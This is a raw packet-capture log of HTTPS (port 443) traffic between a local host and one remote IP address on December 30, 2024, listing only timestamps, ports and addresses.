Dec 30, 2024 19:15:11.424088001 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.435306072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.435338974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.435378075 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.435384035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.435410023 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.460319042 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.460340023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.460381031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.460410118 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.460434914 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.460447073 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.460463047 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.460551977 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.460556984 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.461004019 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.461055994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.461086035 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.461091995 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.461114883 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.461744070 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.461781979 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.461808920 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.461815119 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.461838961 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.479123116 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.479137897 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.479299068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.479332924 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.484149933 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.484163046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.484245062 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.484245062 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.484260082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.513492107 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.513505936 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.513572931 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.513590097 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.513699055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.513711929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.513763905 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.513770103 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.524055004 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.524094105 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.524122953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.524132967 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.524156094 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.548981905 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.549026966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.549056053 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.549067974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.549099922 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.549662113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.549690008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.549716949 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.549721956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.549788952 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.550441027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.550468922 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.550530910 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.550530910 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.550537109 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.571924925 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.571952105 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.571979046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.572021961 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.572041035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.572362900 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.572966099 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.572979927 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.573055983 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.573060989 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.573157072 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.597882032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.597902060 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.597964048 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.597981930 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.598009109 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.598088980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.601247072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.601262093 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.601346970 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.601346970 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.601353884 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.601471901 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.612560987 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.612575054 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.612642050 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.612647057 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.612735987 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.637537956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.637552977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.637618065 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.637645960 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.637653112 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.637665033 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.637744904 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.638349056 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.638365030 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.638499975 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.638505936 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.638832092 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.639008999 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.639050007 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.639082909 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.639087915 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.639113903 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.660092115 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.660173893 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.660181046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.660624027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.660676003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.660705090 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.660710096 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.660737038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.661052942 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.661128044 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.661128044 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.661133051 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.661350965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.661485910 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.661490917 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.672697067 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.672825098 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.672852039 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.672859907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.672882080 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.673302889 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.686788082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.686861038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.686872005 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.686929941 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.686929941 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.689501047 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.689574003 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.700959921 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.701009989 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.701040030 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.701046944 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.701148987 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.701174974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.701281071 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.701284885 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726118088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726133108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726265907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726295948 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.726309061 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726331949 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.726711035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726824999 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726857901 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.726861954 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726871967 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.726891994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.727149010 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.727601051 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.727684021 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.727715015 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.727720022 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.729640961 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.749133110 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.749180079 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.749248981 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.749248981 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.749255896 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.749938965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.749953032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.750046015 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.750076056 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.750082016 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.750106096 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.774857998 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.774871111 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.775202036 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.775223970 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.775238037 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.775353909 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.775360107 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.775415897 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.788141966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.788182974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.788225889 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.788242102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.788269997 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.788304090 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.793450117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.793462038 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.793708086 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.793715954 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.793996096 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.815144062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.815157890 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.815368891 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.815376043 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.815427065 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.815511942 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.815527916 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.815649033 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.815654993 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.815746069 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.837502003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.837518930 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.837589025 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.837595940 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.838747978 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.838764906 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.838829994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.838829994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.838838100 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.839155912 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.849999905 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.850080013 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.850092888 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.850097895 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.850167990 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.863464117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.863477945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.863862038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.863867998 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.876630068 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.876642942 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.876764059 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.876770020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.881959915 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.881973982 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.882143974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.882150888 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.903357029 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.903388023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.903485060 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.903485060 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.903495073 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.904212952 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.904226065 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.904330015 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.904335976 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.925851107 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.925874949 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.925928116 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.925935984 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.925960064 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.927035093 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.927048922 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.927184105 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.927210093 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.938556910 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.938570976 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.938678980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.938688040 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.952217102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.952230930 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.952331066 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.952337980 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.952491045 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.952580929 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.952586889 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.952685118 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.965368032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.965382099 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.965575933 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.965583086 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.965706110 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.970688105 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.970704079 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.970805883 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.970812082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.973684072 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.994132042 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.994147062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.994283915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.994288921 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.994359970 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.995301008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.995404959 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.995409966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.995497942 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.995512962 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:11.995592117 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.995592117 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:11.995599985 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.015228033 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.015266895 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.015391111 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.015398979 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.015474081 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.015939951 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.015957117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.016061068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.016066074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.016149998 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.040615082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.040636063 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.041583061 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.041605949 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.044313908 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.044872046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.045006037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.045037985 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.045219898 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.055948019 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.055968046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.056099892 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.056107044 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.056227922 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.080724955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.080740929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.080915928 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.080930948 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.081011057 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.081033945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.081048965 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.081062078 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.081073046 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.081116915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.081116915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.081813097 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.081825972 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.081909895 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.081918001 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.082016945 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.103127003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.103142023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.103280067 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.103290081 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.103378057 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.104507923 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.104528904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.104625940 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.104633093 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.104684114 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.123761892 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.123922110 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.123930931 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.123955965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.124003887 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.129877090 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.129930019 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:12.129940987 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:12.129978895 CET	49709	443	192.168.2.5	172.67.154.95
